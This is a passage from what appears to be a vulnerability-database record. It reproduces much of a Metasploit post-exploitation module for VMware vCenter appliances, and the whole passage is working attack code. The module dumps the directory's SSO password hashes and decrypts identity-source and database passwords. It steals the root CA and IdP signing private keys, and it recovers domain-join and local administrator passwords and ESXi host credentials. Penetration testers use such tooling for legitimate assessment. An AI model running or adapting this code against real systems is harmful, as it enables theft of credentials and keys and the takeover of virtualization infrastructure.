}\n\n store_valid_credential(user: bind_dn, private: bind_pw, service_data: extra_service_data)\n\n get_aes_keys_from_host\n end\n\n def vmdir_dump\n print_status('Dumping vmdir schema to LDIF and storing to loot...')\n vmdir_ldif = get_ldif_contents(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n if vmdir_ldif.nil?\n print_error('Error processing LDIF file')\n return\n end\n\n p = store_loot('vmdir', 'LDIF', rhost, vmdir_ldif, 'vmdir.ldif', 'vCenter vmdir LDIF dump')\n print_good(\"LDIF Dump: #{p}\")\n\n print_status('Processing vmdir LDIF (this may take several minutes)')\n ldif_file = ::File.open(p, 'rb')\n ldif_data = Net::LDAP::Dataset.read_ldif(ldif_file)\n\n print_status('Processing LDIF entries')\n entries = ldif_data.to_entries\n\n print_status('Processing SSO account hashes')\n vmware_sso_hash_entries = entries.select { |entry| entry[:userpassword].any? }\n process_hashes(vmware_sso_hash_entries)\n\n print_status('Processing SSO identity sources')\n vmware_sso_id_entries = entries.select { |entry| entry[:vmwSTSConnectionStrings].any? }\n process_sso_providers(vmware_sso_id_entries)\n\n if datastore['DUMP_LIC']\n print_status('Extract licenses from vCenter platform')\n vmware_license_entries = entries.select { |entry| entry[:vmwLicSvcLicenseSerialKeys].any? }\n get_vc_licenses(vmware_license_entries)\n end\n end\n\n def vmafd_dump\n if vcenter_infrastructure\n get_vmca_cert\n get_idp_creds\n end\n\n vecs_stores = get_vecs_stores\n return if vecs_stores.nil?\n\n if vecs_stores.empty?\n print_error('Empty vecs-cli store list returned from vCenter')\n return\n end\n\n vecs_stores.each do |vecs_store|\n vecs_entries = get_vecs_entries(vecs_store)\n vecs_entries.each do |vecs_entry|\n next unless vecs_entry['Entry type'] == 'Private Key'\n\n get_vecs_entry(vecs_store, vecs_entry)\n end\n end\n end\n\n def get_vecs_entry(store_name, vecs_entry)\n store_label = store_name.upcase\n\n vprint_status(\"Extract #{store_label} key\")\n key = get_vecs_private_key(store_name, vecs_entry['Alias'])\n if key.nil?\n print_bad(\"Could not extract #{store_label} private key\")\n else\n p = store_loot(vecs_entry['Alias'], 'PEM', rhost, key.to_pem.to_s, \"#{store_label}.key\", \"vCenter #{store_label} Private Key\")\n print_good(\"#{store_label} Key: #{p}\")\n end\n\n vprint_status(\"Extract #{store_label} certificate\")\n cert = validate_x509_cert(vecs_entry['Certificate'])\n if cert.nil?\n print_bad(\"Could not extract #{store_label} certificate\")\n return\n end\n p = store_loot(vecs_entry['Alias'], 'PEM', rhost, cert.to_pem.to_s, \"#{store_label}.pem\", \"vCenter #{store_label} Certificate\")\n print_good(\"#{store_label} Cert: #{p}\")\n\n unless key.nil?\n update_keystore(cert, key)\n end\n end\n\n def get_vmca_cert\n vprint_status('Extract VMCA_ROOT key')\n\n unless file_exist?('/var/lib/vmware/vmca/privatekey.pem') && file_exist?('/var/lib/vmware/vmca/root.cer')\n print_error('Could not locate VMCA_ROOT keypair')\n return\n end\n\n vmca_key_b64 = read_file('/var/lib/vmware/vmca/privatekey.pem')\n\n vmca_key = validate_pkey(vmca_key_b64)\n if vmca_key.nil?\n print_error('Could not extract VMCA_ROOT private key')\n return\n end\n\n p = store_loot('vmca', 'PEM', rhost, vmca_key, 'VMCA_ROOT.key', 'vCenter VMCA root CA private key')\n print_good(\"VMCA_ROOT key: #{p}\")\n\n vprint_status('Extract VMCA_ROOT cert')\n vmca_cert_b64 = read_file('/var/lib/vmware/vmca/root.cer')\n\n vmca_cert = validate_x509_cert(vmca_cert_b64)\n if vmca_cert.nil?\n print_error('Could not extract VMCA_ROOT certificate')\n return\n end\n\n unless vmca_cert.check_private_key(vmca_key)\n print_error('VMCA_ROOT certificate and private key mismatch')\n return\n end\n\n p = store_loot('vmca', 'PEM', rhost, vmca_cert, 'VMCA_ROOT.pem', 'vCenter VMCA root CA certificate')\n print_good(\"VMCA_ROOT cert: #{p}\")\n\n update_keystore(vmca_cert, vmca_key)\n end\n\n # Shamelessly borrowed from vmware_vcenter_vmdir_ldap.rb\n def process_hashes(entries)\n if entries.empty?\n print_warning('No password hashes found')\n return\n end\n\n service_details = {\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: '389',\n protocol: 'tcp',\n service_name: 'vmdir/ldap'\n }\n\n entries.each do |entry|\n # This is the \"username\"\n dn = entry.dn\n\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/middle-layer/password.c#L32-L76\n type, hash, salt = entry[:userpassword].first.unpack('CH128H32')\n\n case type\n when 1\n unless hash.length == 128\n vprint_error(\"Type #{type} hash length is not 128 digits (#{dn})\")\n next\n end\n\n unless salt.length == 32\n vprint_error(\"Type #{type} salt length is not 32 digits (#{dn})\")\n next\n end\n\n # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197\n john_hash = \"$dynamic_82$#{hash}$HEX$#{salt}\"\n else\n vprint_error(\"Hash type #{type.inspect} is not supported yet (#{dn})\")\n next\n end\n\n print_good(\"vSphere SSO User Credential: #{dn}:#{john_hash}\")\n\n create_credential(service_details.merge(\n username: dn,\n private_data: john_hash,\n private_type: :nonreplayable_hash,\n jtr_format: Metasploit::Framework::Hashes.identify_hash(john_hash)\n ))\n end\n end\n\n def process_sso_providers(entries)\n if entries.empty?\n print_warning('No SSO ID provider information found')\n return\n end\n\n if entries.is_a?(String)\n entries = entries.split(\"\\n\")\n end\n\n entries.each do |entry|\n sso_prov_type = entry[:vmwSTSProviderType].first\n sso_conn_str = entry[:vmwSTSConnectionStrings].first\n sso_user = entry[:vmwSTSUserName].first\n\n # On vCenter 7.x instances the tenant AES key was always Base64 encoded vs. plaintext, and vmwSTSPassword was missing from the LDIF dump.\n # It appears that vCenter 7.x does not return vmwSTSPassword even with appropriate LDAP flags - this is not like prior versions.\n # The data can still be extracted directly with ldapsearch syntax below which works in all versions, but is a PITA.\n vmdir_user_sso_pass = cmd_exec(\"#{ldapsearch_bin} -h #{vc_psc_fqdn} -LLL -p 389 -b \\\"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\\\" -D \\\"#{bind_dn}\\\" -w #{shell_bind_pw} \\\"(&(objectClass=vmwSTSIdentityStore)(vmwSTSConnectionStrings=#{sso_conn_str}))\\\" \\\"vmwSTSPassword\\\" | awk -F 'vmwSTSPassword: ' '{print $2}'\").split(\"\\n\").last\n sso_pass = tenant_aes_decrypt(vmdir_user_sso_pass)\n\n sso_domain = entry[:vmwSTSDomainName].first\n\n sso_conn_uri = URI.parse(sso_conn_str)\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: sso_conn_uri.port,\n service_name: sso_conn_uri.scheme,\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: sso_domain\n }\n\n store_valid_credential(user: sso_user, private: sso_pass, service_data: extra_service_data)\n print_status('Found SSO Identity Source Credential:')\n print_good(\"#{sso_prov_type} @ #{sso_conn_str}:\")\n print_good(\"\\t SSOUSER: #{sso_user}\")\n print_good(\"\\t SSOPASS: #{sso_pass}\")\n print_good(\"\\tSSODOMAIN: #{sso_domain}\")\n end\n end\n\n def get_aes_keys_from_host\n print_status('Extracting tenant and vpx AES encryption key...')\n\n tenant_key = get_aes_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n fail_with(Msf::Exploit::Failure::Unknown, 'Error extracting tenant and vpx AES encryption key') if tenant_key.nil?\n\n tenant_key.each do |aes_key|\n aes_key_len = aes_key.length\n # our first case is to process it out\n case aes_key_len\n when 16\n self.vc_tenant_aes_key = aes_key\n self.vc_tenant_aes_key_hex = vc_tenant_aes_key.unpack('H*').first\n vprint_status(\"vCenter returned a plaintext AES key: #{aes_key}\")\n when 24\n self.vc_tenant_aes_key = Base64.strict_decode64(aes_key)\n self.vc_tenant_aes_key_hex = Base64.strict_decode64(aes_key).unpack('H*').first\n vprint_status(\"vCenter returned a Base64 AES key: #{aes_key}\")\n when 64\n self.vc_sym_key = aes_key.scan(/../).map(&:hex).pack('C*')\n self.vc_sym_key_raw = aes_key\n print_good('vSphere vmware-vpx AES encryption')\n print_good(\"\\tHEX: #{aes_key}\")\n else\n print_error(\"Invalid tenant AES encryption key size - expecting 16 raw bytes or 24 Base64 bytes, got #{aes_key_len}\")\n next\n end\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: base_fqdn\n }\n # our second case is to store it correctly\n case aes_key_len\n when 16, 24\n print_good('vSphere Tenant AES encryption')\n print_good(\"\\tKEY: #{vc_tenant_aes_key}\")\n print_good(\"\\tHEX: #{vc_tenant_aes_key_hex}\")\n\n store_valid_credential(user: 'STS AES key', private: vc_tenant_aes_key, service_data: extra_service_data.merge({\n port: 389,\n service_name: 'ldap'\n }))\n when 64\n store_valid_credential(user: 'VPX AES key', private: vc_sym_key_raw, service_data: extra_service_data.merge({\n port: 5432,\n service_name: 'psql'\n }))\n end\n end\n end\n\n def tenant_aes_decrypt(b64)\n # https://github.com/vmware/lightwave/blob/master/vmidentity/idm/server/src/main/java/com/vmware/identity/idm/server/CryptoAESE.java#L44-L45\n ciphertext = Base64.strict_decode64(b64)\n decipher = OpenSSL::Cipher.new('aes-128-ecb')\n decipher.decrypt\n decipher.padding = 0\n decipher.key = vc_tenant_aes_key\n return (decipher.update(ciphertext) + decipher.final).delete(\"\\000\")\n rescue StandardError => e\n elog('Error performing tenant_aes_decrypt', error: e)\n fail_with(Msf::Exploit::Failure::Unknown, 'Error performing tenant_aes_decrypt')\n end\n\n def update_keystore(public_key, private_key)\n if public_key.is_a? String\n cert = validate_x509_cert(public_key)\n else\n cert = public_key\n end\n if private_key.is_a? String\n key = validate_pkey(private_key)\n else\n key = private_key\n end\n cert_thumbprint = OpenSSL::Digest::SHA1.new(cert.to_der).to_s\n keystore[cert_thumbprint] = key\n rescue StandardError => e\n elog('Error updating module keystore', error: e)\n fail_with(Msf::Exploit::Failure::Unknown, 'Error updating module keystore')\n end\n\n def get_idp_creds\n vprint_status('Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP')\n idp_keys = get_idp_keys(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n if idp_keys.nil?\n print_error('Error processing IdP trusted certificate private key')\n return\n end\n\n idp_certs = get_idp_certs(base_fqdn, vc_psc_fqdn, base_dn, bind_dn, shell_bind_pw)\n if idp_certs.nil?\n print_error('Error processing IdP trusted certificate chain')\n return\n end\n\n vprint_status('Parsing vmwSTSTenantCredential certificates and keys')\n\n # vCenter vmdir stores the STS IdP signing credential under the following DN:\n # cn=TenantCredential-1,cn=<sso domain>,cn=Tenants,cn=IdentityManager,cn=Services,<root dn>\n\n sts_cert = nil\n sts_key = nil\n sts_pem = nil\n idp_keys.each do |stskey|\n idp_certs.each do |stscert|\n next unless stscert.check_private_key(stskey)\n\n sts_cert = stscert.to_pem.to_s\n sts_key = stskey.to_pem.to_s\n if validate_sts_cert(sts_cert)\n vprint_status('Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate')\n else # Query IDM to compare our extracted cert with the IDM advertised cert\n print_warning('Could not reconcile vmdir STS IdP cert chain with cert chain advertised by IDM - this credential may not work')\n end\n sts_pem = \"#{sts_key}#{sts_cert}\"\n end\n end\n\n unless sts_pem # We were unable to link a public and private key together\n print_error('Unable to associate IdP certificate and private key')\n return\n end\n\n p = store_loot('idp', 'application/x-pem-file', rhost, sts_key, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')\n print_good(\"SSO_STS_IDP key: #{p}\")\n\n p = store_loot('idp', 'application/x-pem-file', rhost, sts_cert, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')\n print_good(\"SSO_STS_IDP cert: #{p}\")\n\n update_keystore(sts_cert, sts_key)\n end\n\n def get_vc_licenses(entries)\n if entries.empty?\n print_warning('No vSphere Licenses Found')\n return\n end\n\n if entries.is_a?(String)\n entries = entries.split(\"\\n\")\n end\n\n entries.each do |entry|\n vc_lic_name = entry[:vmwLicSvcLicenseName].first\n vc_lic_type = entry[:vmwLicSvcLicenseType].first\n vc_lic_key = entry[:vmwLicSvcLicenseSerialKeys].first\n vc_lic_label = \"#{vc_lic_name} #{vc_lic_type}\"\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 443,\n service_name: 'https',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: base_fqdn\n }\n\n store_valid_credential(user: vc_lic_label, private: vc_lic_key, service_data: extra_service_data)\n print_good(\"\\t#{vc_lic_label}: #{vc_lic_key}\")\n end\n end\n\n def enum_vm_cust_spec\n vpx_customization_specs = get_vpx_customization_spec(shell_vcdb_pass, vcdb_user, vcdb_name)\n\n if vpx_customization_specs.nil?\n print_warning('No vpx_customization_spec entries evident')\n return\n end\n\n vpx_customization_specs.each do |spec|\n xmldoc = vpx_customization_specs[spec]\n\n unless (enc_cert_len = xmldoc.at_xpath('/ConfigRoot/encryptionKey/_length').text.to_i)\n print_error(\"Could not determine DER byte length for vpx_customization_spec '#{spec}'\")\n next\n end\n\n enc_cert_der = []\n der_idx = 0\n\n print_status('Validating data encipherment key')\n while der_idx <= enc_cert_len - 1\n enc_cert_der << xmldoc.at_xpath(\"/ConfigRoot/encryptionKey/e[@id=#{der_idx}]\").text.to_i\n der_idx += 1\n end\n\n enc_cert = validate_x509_cert(enc_cert_der.pack('C*'))\n if enc_cert.nil?\n print_error(\"Invalid encryption certificate for vpx_customization_spec '#{spec}'\")\n next\n end\n\n enc_cert_thumbprint = OpenSSL::Digest::SHA1.new(enc_cert.to_der).to_s\n vprint_status(\"Secrets for '#{spec}' were encrypted using public certificate with SHA1 digest #{enc_cert_thumbprint}\")\n\n unless (enc_keystore_entry = keystore[enc_cert_thumbprint])\n print_warning('Could not associate encryption public key with any of the private keys extracted from vCenter, skipping')\n next\n end\n\n vc_cipher_key = validate_pkey(enc_keystore_entry)\n if vc_cipher_key.nil?\n print_error(\"Could not access private key for VM Guest Customization Template '#{spec}', cannot decrypt\")\n next\n end\n\n unless enc_cert.check_private_key(vc_cipher_key)\n print_error(\"vCenter private key does not associate with public key for VM Guest Customization Template '#{spec}', cannot decrypt\")\n next\n end\n\n key_digest = OpenSSL::Digest::SHA1.new(vc_cipher_key.to_der).to_s\n vprint_status(\"Decrypt using #{vc_cipher_key.n.num_bits}-bit #{vc_cipher_key.oid} SHA1: #{key_digest}\")\n\n # Check for static local machine password\n if (sysprep_element_unattend = xmldoc.at_xpath('/ConfigRoot/identity/guiUnattended'))\n next unless sysprep_element_unattend.at_xpath('//guiUnattended/password/plainText')\n\n secret_is_plaintext = sysprep_element_unattend.xpath('//guiUnattended/password/plainText').text\n\n case secret_is_plaintext.downcase\n when 'true'\n secret_plaintext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text\n when 'false'\n secret_ciphertext = sysprep_element_unattend.xpath('//guiUnattended/password/value').text\n ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse\n secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete(\"\\000\")\n else\n print_error(\"Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'\")\n next\n end\n print_status(\"Initial administrator account password found for vpx_customization_spec '#{spec}':\")\n print_good(\"\\tInitial Admin PW: #{secret_plaintext}\")\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 445,\n protocol: 'tcp',\n service_name: 'Windows',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: '.'\n }\n\n store_valid_credential(user: '(local built-in administrator)', private: secret_plaintext, service_data: extra_service_data)\n end\n\n # Check for account used for domain join\n next unless (domain_element_unattend = xmldoc.at_xpath('//identification'))\n next unless domain_element_unattend.at_xpath('//identification/domainAdminPassword/plainText')\n\n secret_is_plaintext = domain_element_unattend.xpath('//identification/domainAdminPassword/plainText').text\n domain_user = domain_element_unattend.xpath('//identification/domainAdmin').text\n domain_base = domain_element_unattend.xpath('//identification/joinDomain').text\n\n case secret_is_plaintext.downcase\n when 'true'\n secret_plaintext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text\n when 'false'\n secret_ciphertext = sysprep_element_unattend.xpath('//identification/domainAdminPassword/value').text\n ciphertext_bytes = Base64.strict_decode64(secret_ciphertext.to_s).reverse\n secret_plaintext = vc_cipher_key.decrypt(ciphertext_bytes, rsa_padding_mode: 'pkcs1').delete(\"\\000\")\n else\n print_error(\"Malformed XML received from vCenter for VM Guest Customization Template '#{spec}'\")\n next\n end\n\n print_status(\"AD domain join account found for vpx_customization_spec '#{spec}':\")\n\n case domain_base.include?('.')\n when true\n print_good(\"\\tAD User: #{domain_user}@#{domain_base}\")\n when false\n print_good(\"\\tAD User: #{domain_base}\\\\#{domain_user}\")\n end\n print_good(\"\\tAD Pass: #{secret_plaintext}\")\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 445,\n protocol: 'tcp',\n service_name: 'Windows',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: domain_base\n }\n\n store_valid_credential(user: domain_user, private: secret_plaintext, service_data: extra_service_data)\n end\n end\n\n def enum_vpx_user_creds\n vpxuser_rows = get_vpx_users(shell_vcdb_pass, vcdb_user, vcdb_name, vc_sym_key)\n\n if vpxuser_rows.nil?\n print_warning('No ESXi hosts attached to this vCenter system')\n return\n end\n\n vpxuser_rows.each do |user|\n print_good(\"ESXi Host #{user['fqdn']} [#{user['ip']}]\\t LOGIN: #{user['user']} PASS: #{user['password']}\")\n\n extra_service_data = {\n address: user['ip'],\n port: 22,\n protocol: 'tcp',\n service_name: 'ssh',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: user['fqdn']\n }\n\n # XXX is this always root? store_valid_credential(user: 'root', private: user['password'], service_data: extra_service_data)\n store_valid_credential(user: user['user'], private: user['password'], service_data: extra_service_data)\n end\n end\n\n def get_db_creds\n db_properties = process_vcdb_properties_file\n\n self.vcdb_name = db_properties['name']\n self.vcdb_user = db_properties['username']\n self.vcdb_pass = db_properties['password']\n\n self.shell_vcdb_pass = \"'#{vcdb_pass.gsub(\"'\") { \"\\\\'\" }}'\"\n\n print_good(\"\\tVCDB Name: #{vcdb_name}\")\n print_good(\"\\tVCDB User: #{vcdb_user}\")\n print_good(\"\\tVCDB Pass: #{vcdb_pass}\")\n\n extra_service_data = {\n address: Rex::Socket.getaddress(rhost),\n port: 5432,\n service_name: 'psql',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: vcdb_name\n }\n\n store_valid_credential(user: vcdb_user, private: vcdb_pass, service_data: extra_service_data)\n print_status('Checking for VPX Users')\n creds = query_vpx_creds(vcdb_pass, vcdb_user, vcdb_name, vc_sym_key_raw)\n if creds.nil?\n print_bad('No VPXUSER entries were found')\n return\n end\n creds.each do |cred|\n extra_service_data = {\n address: cred['ip_address'],\n service_name: 'vpx',\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n realm_key: Metasploit::Model::Realm::Key::WILDCARD,\n realm_value: vcdb_name\n }\n if cred.key? 'decrypted_password'\n print_good(\"VPX Host creds found: #{cred['user']}, #{cred['decrypted_password']} for #{cred['ip_address']}\")\n credential_data = {\n username: cred['user'],\n private_data: cred['decrypted_password'],\n private_type: :password\n }.merge(extra_service_data)\n else\n print_good(\"VPX Host creds found: #{cred['user']}, #{cred['password_hash']} for #{cred['ip_address']}\")\n credential_data = {\n username: cred['user'],\n private_data: cred['password_hash'],\n private_type: :nonreplayable_hash\n # this is encrypted, not hashed, so no need for the following line, leaving it as a note\n # jtr_format: Metasploit::Framework::Hashes.identify_hash(cred['password_hash'])\n }.merge(extra_service_data)\n end\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(extra_service_data)\n\n create_credential_login(login_data)\n end\n end\n\n def validate_sts_cert(test_cert)\n cert = validate_x509_cert(test_cert)\n return false if cert.nil?\n\n vprint_status('Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter')\n\n idm_cmd = cmd_exec(\"curl -f -s http://localhost:7080/idm/tenant/#{base_fqdn}/certificates?scope=TENANT\")\n\n if idm_cmd.blank?\n print_error('Unable to query IDM tenant information, cannot validate ssoserverSign certificate against IDM')\n return false\n end\n\n if (idm_json = JSON.parse(idm_cmd).first)\n idm_json['certificates'].each do |idm|\n cert_verify = validate_x509_cert(idm['encoded'])\n if cert_verify.nil?\n print_error('Invalid x509 certificate extracted from IDM!')\n return false\n end\n next unless cert == cert_verify\n\n return true\n end\n else\n print_error('Unable to parse IDM tenant certificates downloaded from http://localhost:7080/idm/tenant/ on local vCenter')\n return false\n end\n\n print_error('No vSphere IDM tenant certificates returned from http://localhost:7080/idm/tenant/')\n false\n end\n\n def validate_target\n if vcenter_management\n vc_db_type = get_database_type\n unless vc_db_type == 'embedded'\n fail_with(Msf::Exploit::Failure::NoTarget, \"This module only supports embedded PostgreSQL, appliance reports DB type '#{vc_db_type}'\")\n end\n\n unless command_exists?(psql_bin)\n fail_with(Msf::Exploit::Failure::NoTarget, \"Could not find #{psql_bin}\")\n end\n end\n\n self.vcenter_fqdn = get_fqdn\n if vcenter_fqdn.nil?\n print_bad('Could not determine vCenter DNS FQDN')\n self.vcenter_fqdn = ''\n end\n\n vsphere_machine_ipv4 = get_ipv4\n if vsphere_machine_ipv4.nil? || !Rex::Socket.is_ipv4?(vsphere_machine_ipv4)\n print_bad('Could not determine vCenter IPv4 address')\n else\n print_status(\"Appliance IPv4: #{vsphere_machine_ipv4}\")\n end\n\n self.vc_psc_fqdn = get_platform_service_controller(vc_type_management)\n os, build = get_os_version\n\n print_status(\"Appliance Hostname: #{vcenter_fqdn}\")\n print_status(\"Appliance OS: #{os}-#{build}\")\n host_info = {\n host: session.session_host,\n name: vcenter_fqdn,\n os_flavor: os,\n os_sp: build,\n purpose: 'server',\n info: 'vCenter Server'\n }\n if os.downcase.include? 'linux'\n host_info[:os_name] = 'linux'\n end\n report_host(host_info)\n end\n\n def get_vcsa_version\n self.vc_type_embedded = false\n self.vc_type_infrastructure = false\n self.vc_type_management = false\n\n vcsa_type = get_deployment_type\n case vcsa_type\n when nil\n fail_with(Msf::Exploit::Failure::BadConfig, 'Could not find /etc/vmware/deployment.node.type')\n when 'embedded' # Integrated vCenter and PSC\n self.vc_deployment_type = 'vCenter Appliance (Embedded)'\n self.vc_type_embedded = true\n when 'infrastructure' # PSC only\n self.vc_deployment_type = 'vCenter Platform Service Controller'\n self.vc_type_infrastructure = true\n when 'management' # vCenter only\n self.vc_deployment_type = 'vCenter Appliance (Management)'\n self.vc_type_management = true\n else\n fail_with(Msf::Exploit::Failure::Unknown, \"Unable to determine appliance deployment type returned from server: #{vcsa_type}\")\n end\n\n if vcenter_management\n self.vcsa_build = get_vcenter_build\n end\n\n print_status(vcsa_build)\n print_status(vc_deployment_type)\n end\n\n private\n\n attr_accessor :base_dn, :base_fqdn, :bind_dn, :bind_pw, :keystore, :shell_bind_pw, :shell_vcdb_pass, :vc_deployment_type, :vc_psc_fqdn, :vc_sym_key, :vc_sym_key_raw, :vc_tenant_aes_key, :vc_tenant_aes_key_hex, :vc_type_embedded, :vc_type_infrastructure, :vc_type_management, :vcdb_name, :vcdb_pass, :vcdb_user, :vcenter_fqdn, :vcsa_build\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/vcenter_secrets_dump.rb", "cvss": {"score": 0.0, "vector": "NONE"}}]}
VMware vCenter Server 6.5 / 6.7 / 7.0 Information Disclosure (VMSA-2022-0009)
